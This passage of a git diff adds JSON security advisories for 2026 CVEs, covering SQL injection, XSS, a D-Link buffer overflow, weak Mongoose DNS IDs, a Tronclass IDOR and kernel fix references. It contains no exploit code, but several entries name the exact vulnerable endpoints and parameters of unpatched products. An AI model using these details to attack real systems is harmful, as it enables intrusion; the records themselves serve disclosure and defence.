"affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2964" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347331" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347331" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.755221" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T02:16:39Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-9rv8-797j-7r85/GHSA-9rv8-797j-7r85.json b/advisories/unreviewed/2026/02/GHSA-9rv8-797j-7r85/GHSA-9rv8-797j-7r85.json new file mode 100644 index 0000000000000..52086352af573 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-9rv8-797j-7r85/GHSA-9rv8-797j-7r85.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9rv8-797j-7r85", + "modified": "2026-02-23T03:30:22Z", + "published": "2026-02-23T03:30:22Z", + "aliases": [ + "CVE-2026-24494" + ], + "details": "SQL Injection vulnerability in the /api/integrations/getintegrations endpoint of Order Up Online Ordering System 1.0 allows an unauthenticated attacker to access sensitive backend database data via a crafted store_id parameter in a POST request.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24494" + }, + { + "type": "WEB", + "url": "https://www.spartanssec.com/post/multiple-unauthenticated-sql-injection-vulnerabilities" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T02:16:39Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-m5mm-h952-fxjj/GHSA-m5mm-h952-fxjj.json b/advisories/unreviewed/2026/02/GHSA-m5mm-h952-fxjj/GHSA-m5mm-h952-fxjj.json new file mode 100644 index 0000000000000..68734086b886b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-m5mm-h952-fxjj/GHSA-m5mm-h952-fxjj.json @@ -0,0 +1,54 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m5mm-h952-fxjj", + "modified": "2026-02-23T03:30:22Z", + "published": "2026-02-23T03:30:22Z", + "aliases": [ + "CVE-2026-2966" + ], + "details": "A weakness has been identified in Cesanta Mongoose up to 7.20. The impacted element is the function mg_sendnsreq of the file /src/dns.c of the component DNS Transaction ID Handler. Executing a manipulation of the argument random can lead to insufficiently random values. The attack can be launched remotely. The attack requires a high level of complexity. The exploitability is regarded as difficult. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2966" + }, + { + "type": "WEB", + "url": "https://github.com/dwBruijn/CVEs/blob/main/Mongoose/mg_sendnsreq.md" + }, + { + "type": "WEB", + "url": "https://github.com/dwBruijn/CVEs/blob/main/Mongoose/mg_sendnsreq.md#poc" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347333" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347333" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.755304" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T03:15:59Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-m69x-r9q9-whf9/GHSA-m69x-r9q9-whf9.json b/advisories/unreviewed/2026/02/GHSA-m69x-r9q9-whf9/GHSA-m69x-r9q9-whf9.json new file mode 100644 index 0000000000000..add8b883a88d8 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-m69x-r9q9-whf9/GHSA-m69x-r9q9-whf9.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m69x-r9q9-whf9", + "modified": "2026-02-23T03:30:22Z", + "published": "2026-02-23T03:30:22Z", + "aliases": [ + "CVE-2026-2963" + ], + "details": "A vulnerability was determined in Jinher OA C6 up to 20260210. This issue affects some unknown processing of the file /C6/Jhsoft.Web.officesupply/OfficeSupplyTypeRight.aspx. This manipulation of the argument id/offsnum causes sql injection. It is possible to initiate the attack remotely. The exploit has been publicly disclosed and may be utilized. It is suggested to install a patch to address this issue. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2963" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347330" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347330" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.755216" + }, + { + "type": "WEB", + "url": "https://vuln.ricky.place/Jinher/C6" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T01:16:18Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p2r3-72mr-vwg2/GHSA-p2r3-72mr-vwg2.json b/advisories/unreviewed/2026/02/GHSA-p2r3-72mr-vwg2/GHSA-p2r3-72mr-vwg2.json new file mode 100644 index 0000000000000..b9cb35160dd87 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p2r3-72mr-vwg2/GHSA-p2r3-72mr-vwg2.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p2r3-72mr-vwg2", + "modified": "2026-02-23T03:30:22Z", + "published": "2026-02-23T03:30:22Z", + "aliases": [ + "CVE-2026-2962" + ], + "details": "A vulnerability was found in D-Link DWR-M960 1.01.07. This vulnerability affects the function sub_460F30 of the file /boafrm/formDateReboot of the component Scheduled Reboot Configuration Endpoint. The manipulation of the argument submit-url results in stack-based buffer overflow. The attack may be performed from remote. The exploit has been made public and could be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2962" + }, + { + "type": "WEB", + "url": "https://github.com/LX-66-LX/cve-new/issues/29" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347329" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347329" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754517" + }, + { + "type": "WEB", + "url": "https://www.dlink.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T01:16:17Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w6qc-qw25-92c3/GHSA-w6qc-qw25-92c3.json b/advisories/unreviewed/2026/02/GHSA-w6qc-qw25-92c3/GHSA-w6qc-qw25-92c3.json new file mode 100644 index 0000000000000..0b82b0954867b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w6qc-qw25-92c3/GHSA-w6qc-qw25-92c3.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w6qc-qw25-92c3", + "modified": "2026-02-23T03:30:22Z", + "published": "2026-02-23T03:30:22Z", + "aliases": [ + "CVE-2026-2997" + ], + "details": "Tronclass developed by WisdomGarden has a Insecure Direct Object Reference vulnerability. After obtaining a course ID, authenticated remote attackers to modify a specific parameter to obtain a course invitation code, thereby joining any course.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2997" + }, + { + "type": "WEB", + "url": "https://www.twcert.org.tw/en/cp-139-10721-276b6-2.html" + }, + { + "type": "WEB", + "url": "https://www.twcert.org.tw/tw/cp-132-10720-ecdfd-1.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-639" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T03:15:59Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xcgv-f626-23hx/GHSA-xcgv-f626-23hx.json b/advisories/unreviewed/2026/02/GHSA-xcgv-f626-23hx/GHSA-xcgv-f626-23hx.json new file mode 100644 index 0000000000000..348a6e9c4410b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xcgv-f626-23hx/GHSA-xcgv-f626-23hx.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xcgv-f626-23hx", + "modified": "2026-02-23T03:30:22Z", + "published": "2026-02-23T03:30:22Z", + "aliases": [ + "CVE-2026-2965" + ], + "details": "A security flaw has been discovered in 07FLYCMS, 07FLY-CMS and 07FlyCRM up to 1.2.9. The affected element is an unknown function of the file /admin/SysModule/edit.html of the component System Extension Module. Performing a manipulation of the argument Title results in cross site scripting. The attack can be initiated remotely. The exploit has been released to the public and may be used for attacks. This product is published under multiple names. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2965" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347332" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347332" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.755225" + }, + { + "type": "WEB", + "url": "https://www.notion.so/07FlyCRM-Stored-Cross-Site-Scripting-XSS-in-SysModule-module-303ea92a3c4180d3a9a8e9f6c3d2915a?v=2ffea92a3c418057a8b7000c66564aa1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T03:15:58Z" + } +} \ No newline at end of file From 395d01fc72e66f2ee385dc9b82782b0984b417ea Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Mon, 23 Feb 2026 06:32:07 +0000 Subject: [PATCH 50/77] Advisory Database Sync --- .../GHSA-333w-78wm-wpxh.json | 52 ++++++++++++++ .../GHSA-365g-rr2h-rx65.json | 6 +- .../GHSA-3w2g-4qx3-2mmw.json | 6 +- .../GHSA-5jgq-pv8m-5cx7.json | 6 +- .../GHSA-5qf3-3gp9-pjx6.json | 6 +- .../GHSA-6h9v-2cfh-rp3v.json | 52 ++++++++++++++ .../GHSA-6xrx-3vj8-2rjc.json | 6 +- .../GHSA-78xc-39m5-v2c6.json | 6 +- .../GHSA-876r-52fj-4pxf.json | 6 +- .../GHSA-8j5g-3q2r-xfjh.json | 6 +- .../GHSA-9wwr-2jh3-482p.json | 6 +- .../GHSA-c6h3-vh8h-r8mj.json | 56 +++++++++++++++ .../GHSA-f7pj-q7w5-89fg.json | 6 +- .../GHSA-g3vh-wfh4-fp76.json | 6 +- .../GHSA-h437-rr98-fx56.json | 6 +- .../GHSA-hg58-x52p-859c.json | 56 +++++++++++++++ .../GHSA-hm88-j5r4-fwj3.json | 44 ++++++++++++ .../GHSA-hx47-q2x9-r28j.json | 72 +++++++++++++++++++ .../GHSA-j6h2-wr53-6vcg.json | 6 +- .../GHSA-j87r-wgfm-7fjj.json | 6 +- .../GHSA-jp99-8xc8-367m.json | 6 +- .../GHSA-jprc-mg35-68jq.json | 56 +++++++++++++++ .../GHSA-m34c-wrf8-mw69.json | 6 +- .../GHSA-mx4x-pxgm-r77w.json | 6 +- .../GHSA-p525-h9pq-233r.json | 6 +- .../GHSA-p68h-c56f-p3v6.json | 6 +- .../GHSA-q5xx-fxv3-xxqf.json | 56 +++++++++++++++ .../GHSA-w94g-pmcx-r454.json | 6 +- 28 files changed, 544 insertions(+), 20 deletions(-) create mode 100644 advisories/unreviewed/2026/02/GHSA-333w-78wm-wpxh/GHSA-333w-78wm-wpxh.json create mode 100644 advisories/unreviewed/2026/02/GHSA-6h9v-2cfh-rp3v/GHSA-6h9v-2cfh-rp3v.json create mode 100644 advisories/unreviewed/2026/02/GHSA-c6h3-vh8h-r8mj/GHSA-c6h3-vh8h-r8mj.json create mode 100644 advisories/unreviewed/2026/02/GHSA-hg58-x52p-859c/GHSA-hg58-x52p-859c.json create mode 100644 advisories/unreviewed/2026/02/GHSA-hm88-j5r4-fwj3/GHSA-hm88-j5r4-fwj3.json create mode 100644 advisories/unreviewed/2026/02/GHSA-hx47-q2x9-r28j/GHSA-hx47-q2x9-r28j.json create mode 100644 advisories/unreviewed/2026/02/GHSA-jprc-mg35-68jq/GHSA-jprc-mg35-68jq.json create mode 100644 advisories/unreviewed/2026/02/GHSA-q5xx-fxv3-xxqf/GHSA-q5xx-fxv3-xxqf.json diff --git a/advisories/unreviewed/2026/02/GHSA-333w-78wm-wpxh/GHSA-333w-78wm-wpxh.json b/advisories/unreviewed/2026/02/GHSA-333w-78wm-wpxh/GHSA-333w-78wm-wpxh.json new file mode 100644 index 0000000000000..c9e7c7468342c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-333w-78wm-wpxh/GHSA-333w-78wm-wpxh.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-333w-78wm-wpxh", + "modified": "2026-02-23T06:30:18Z", + "published": "2026-02-23T06:30:18Z", + "aliases": [ + "CVE-2026-2971" + ], + "details": "A vulnerability was found in a466350665 Smart-SSO up to 2.1.1. Affected by this issue is some unknown functionality of the file smart-sso-server/src/main/resources/templates/login.html of the component Login. Performing a manipulation of the argument redirectUri results in cross site scripting. The attack is possible to be carried out remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2971" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347338" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347338" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.756025" + }, + { + "type": "WEB", + "url": "https://www.notion.so/Smart-SSO-Reflected-XSS-vulnerabilities-in-redirectUri-parameter-304ea92a3c41805a8223c4ba75831802" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T05:16:20Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-365g-rr2h-rx65/GHSA-365g-rr2h-rx65.json b/advisories/unreviewed/2026/02/GHSA-365g-rr2h-rx65/GHSA-365g-rr2h-rx65.json index 414c99dc1227c..5d446af118b92 100644 --- a/advisories/unreviewed/2026/02/GHSA-365g-rr2h-rx65/GHSA-365g-rr2h-rx65.json +++ b/advisories/unreviewed/2026/02/GHSA-365g-rr2h-rx65/GHSA-365g-rr2h-rx65.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-365g-rr2h-rx65", - "modified": "2026-02-18T18:30:40Z", + "modified": "2026-02-23T06:30:17Z", "published": "2026-02-18T18:30:40Z", "aliases": [ "CVE-2025-71234" @@ -22,6 +22,10 @@ "type": "WEB", "url": "https://git.kernel.org/stable/c/5d810ba377eddee95d30766d360a14efbb3d1872" }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/86c946bcc00f6390ef65e9614ae60a9377e454f8" + }, { "type": "WEB", "url": "https://git.kernel.org/stable/c/9a0f3fa6ecd0c9c32dbc367a57482bbf7c7d25bf" diff --git a/advisories/unreviewed/2026/02/GHSA-3w2g-4qx3-2mmw/GHSA-3w2g-4qx3-2mmw.json b/advisories/unreviewed/2026/02/GHSA-3w2g-4qx3-2mmw/GHSA-3w2g-4qx3-2mmw.json index 28af8376248f3..06ca1e072c09a 100644 --- a/advisories/unreviewed/2026/02/GHSA-3w2g-4qx3-2mmw/GHSA-3w2g-4qx3-2mmw.json +++ b/advisories/unreviewed/2026/02/GHSA-3w2g-4qx3-2mmw/GHSA-3w2g-4qx3-2mmw.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-3w2g-4qx3-2mmw", - "modified": "2026-02-19T18:31:43Z", + "modified": "2026-02-23T06:30:17Z", "published": "2026-02-18T18:30:40Z", "aliases": [ "CVE-2025-71232" @@ -22,6 +22,10 @@ "type": "WEB", "url": "https://git.kernel.org/stable/c/19ac050ef09a2f0a9d9787540f77bb45cf9033e8" }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/7adbd2b7809066c75f0433e5e2a8e114b429f30f" + }, { "type": "WEB", "url": "https://git.kernel.org/stable/c/8e7597b4efee6143439641bc6522f247d585e060" diff --git a/advisories/unreviewed/2026/02/GHSA-5jgq-pv8m-5cx7/GHSA-5jgq-pv8m-5cx7.json b/advisories/unreviewed/2026/02/GHSA-5jgq-pv8m-5cx7/GHSA-5jgq-pv8m-5cx7.json index 95597dbc48090..411ccb818c324 100644 --- a/advisories/unreviewed/2026/02/GHSA-5jgq-pv8m-5cx7/GHSA-5jgq-pv8m-5cx7.json +++ b/advisories/unreviewed/2026/02/GHSA-5jgq-pv8m-5cx7/GHSA-5jgq-pv8m-5cx7.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-5jgq-pv8m-5cx7", - "modified": "2026-02-18T18:30:40Z", + "modified": "2026-02-23T06:30:18Z", "published": "2026-02-18T18:30:40Z", "aliases": [ "CVE-2026-23226" @@ -18,6 +18,10 @@ "type": "WEB", "url": "https://git.kernel.org/stable/c/36ef605c0395b94b826a8c8d6f2697071173de6e" }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/4f3a06cc57976cafa8c6f716646be6c79a99e485" + }, { "type": "WEB", "url": "https://git.kernel.org/stable/c/e4a8a96a93d08570e0405cfd989a8a07e5b6ff33" diff --git a/advisories/unreviewed/2026/02/GHSA-5qf3-3gp9-pjx6/GHSA-5qf3-3gp9-pjx6.json b/advisories/unreviewed/2026/02/GHSA-5qf3-3gp9-pjx6/GHSA-5qf3-3gp9-pjx6.json index 34d0010905ba6..4e0bdcc852df2 100644 --- a/advisories/unreviewed/2026/02/GHSA-5qf3-3gp9-pjx6/GHSA-5qf3-3gp9-pjx6.json +++ b/advisories/unreviewed/2026/02/GHSA-5qf3-3gp9-pjx6/GHSA-5qf3-3gp9-pjx6.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-5qf3-3gp9-pjx6", - "modified": "2026-02-19T18:31:44Z", + "modified": "2026-02-23T06:30:18Z", "published": "2026-02-18T18:30:40Z", "aliases": [ "CVE-2026-23222" @@ -14,6 +14,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23222" }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/1562b1fb7e17c1b3addb15e125c718b2be7f5512" + }, { "type": "WEB", "url": "https://git.kernel.org/stable/c/2ed27b5a1174351148c3adbfc0cd86d54072ba2e" diff --git a/advisories/unreviewed/2026/02/GHSA-6h9v-2cfh-rp3v/GHSA-6h9v-2cfh-rp3v.json b/advisories/unreviewed/2026/02/GHSA-6h9v-2cfh-rp3v/GHSA-6h9v-2cfh-rp3v.json new file mode 100644 index 0000000000000..735474aa5b8c7 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-6h9v-2cfh-rp3v/GHSA-6h9v-2cfh-rp3v.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6h9v-2cfh-rp3v", + "modified": "2026-02-23T06:30:19Z", + "published": "2026-02-23T06:30:18Z", + "aliases": [ + "CVE-2026-2972" + ], + "details": "A vulnerability was determined in a466350665 Smart-SSO up to 2.1.1. This affects the function Save of the file smart-sso-server/src/main/java/openjoe/smart/sso/server/controller/admin/UserController.java of the component Role Edit Page. Executing a manipulation can lead to cross site scripting. The attack may be performed from remote. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2972" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347339" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347339" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.756026" + }, + { + "type": "WEB", + "url": "https://www.notion.so/Smart-SSO-Stored-Cross-Site-Scripting-XSS-in-Role-Edit-Page-303ea92a3c4180f4beb9c119653ce51d" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T06:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-6xrx-3vj8-2rjc/GHSA-6xrx-3vj8-2rjc.json b/advisories/unreviewed/2026/02/GHSA-6xrx-3vj8-2rjc/GHSA-6xrx-3vj8-2rjc.json index d3013aa26201c..8c79829dd4f00 100644 --- a/advisories/unreviewed/2026/02/GHSA-6xrx-3vj8-2rjc/GHSA-6xrx-3vj8-2rjc.json +++ b/advisories/unreviewed/2026/02/GHSA-6xrx-3vj8-2rjc/GHSA-6xrx-3vj8-2rjc.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-6xrx-3vj8-2rjc", - "modified": "2026-02-18T18:30:39Z", + "modified": "2026-02-23T06:30:17Z", "published": "2026-02-18T18:30:39Z", "aliases": [ "CVE-2025-71230" @@ -14,6 +14,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71230" }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/05ce49a902be15dc93854cbfc20161205a9ee446" + }, { "type": "WEB", "url": "https://git.kernel.org/stable/c/399219831514126bc9541e8eadefe02c6fbd9166" diff --git a/advisories/unreviewed/2026/02/GHSA-78xc-39m5-v2c6/GHSA-78xc-39m5-v2c6.json b/advisories/unreviewed/2026/02/GHSA-78xc-39m5-v2c6/GHSA-78xc-39m5-v2c6.json index 27a6aca498c97..fc677b090f509 100644 --- a/advisories/unreviewed/2026/02/GHSA-78xc-39m5-v2c6/GHSA-78xc-39m5-v2c6.json +++ b/advisories/unreviewed/2026/02/GHSA-78xc-39m5-v2c6/GHSA-78xc-39m5-v2c6.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-78xc-39m5-v2c6", - "modified": "2026-02-19T18:31:43Z", + "modified": "2026-02-23T06:30:17Z", "published": "2026-02-18T18:30:40Z", "aliases": [ "CVE-2025-71233" @@ -26,6 +26,10 @@ "type": "WEB", "url": "https://git.kernel.org/stable/c/73cee890adafa2c219bb865356e08e7f82423fe5" }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/7c5c7d06bd1f86d2c3ebe62be903a4ba42db4d2c" + }, { "type": "WEB", "url": "https://git.kernel.org/stable/c/8cb905eca73944089a0db01443c7628a9e87012d" diff --git a/advisories/unreviewed/2026/02/GHSA-876r-52fj-4pxf/GHSA-876r-52fj-4pxf.json b/advisories/unreviewed/2026/02/GHSA-876r-52fj-4pxf/GHSA-876r-52fj-4pxf.json index 448fe32ded5ec..7a4bd28abf2c5 100644 --- a/advisories/unreviewed/2026/02/GHSA-876r-52fj-4pxf/GHSA-876r-52fj-4pxf.json +++ b/advisories/unreviewed/2026/02/GHSA-876r-52fj-4pxf/GHSA-876r-52fj-4pxf.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-876r-52fj-4pxf", - "modified": "2026-02-19T18:31:43Z", + "modified": "2026-02-23T06:30:17Z", "published": "2026-02-18T18:30:40Z", "aliases": [ "CVE-2025-71235" @@ -22,6 +22,10 @@ "type": "WEB", "url": "https://git.kernel.org/stable/c/7062eb0c488f35730334daad9495d9265c574853" }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/8890bf450e0b6b283f48ac619fca5ac2f14ddd62" + }, { "type": "WEB", "url": "https://git.kernel.org/stable/c/891f9969a29e9767a453cef4811c8d2472ccab49" diff --git a/advisories/unreviewed/2026/02/GHSA-8j5g-3q2r-xfjh/GHSA-8j5g-3q2r-xfjh.json b/advisories/unreviewed/2026/02/GHSA-8j5g-3q2r-xfjh/GHSA-8j5g-3q2r-xfjh.json index 5ff8a05c13e27..43bdad75fed85 100644 --- a/advisories/unreviewed/2026/02/GHSA-8j5g-3q2r-xfjh/GHSA-8j5g-3q2r-xfjh.json +++ b/advisories/unreviewed/2026/02/GHSA-8j5g-3q2r-xfjh/GHSA-8j5g-3q2r-xfjh.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-8j5g-3q2r-xfjh", - "modified": "2026-02-18T18:30:40Z", + "modified": "2026-02-23T06:30:18Z", "published": "2026-02-18T18:30:40Z", "aliases": [ "CVE-2026-23224" @@ -14,6 +14,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23224" }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/1caf50ce4af096d0280d59a31abdd85703cd995c" + }, { "type": "WEB", "url": "https://git.kernel.org/stable/c/ae385826840a3c8e09bf38cac90adcd690716f57" diff --git a/advisories/unreviewed/2026/02/GHSA-9wwr-2jh3-482p/GHSA-9wwr-2jh3-482p.json b/advisories/unreviewed/2026/02/GHSA-9wwr-2jh3-482p/GHSA-9wwr-2jh3-482p.json index 44bf46a79999f..713a6adc2ca91 100644 --- a/advisories/unreviewed/2026/02/GHSA-9wwr-2jh3-482p/GHSA-9wwr-2jh3-482p.json +++ b/advisories/unreviewed/2026/02/GHSA-9wwr-2jh3-482p/GHSA-9wwr-2jh3-482p.json @@ -1,7 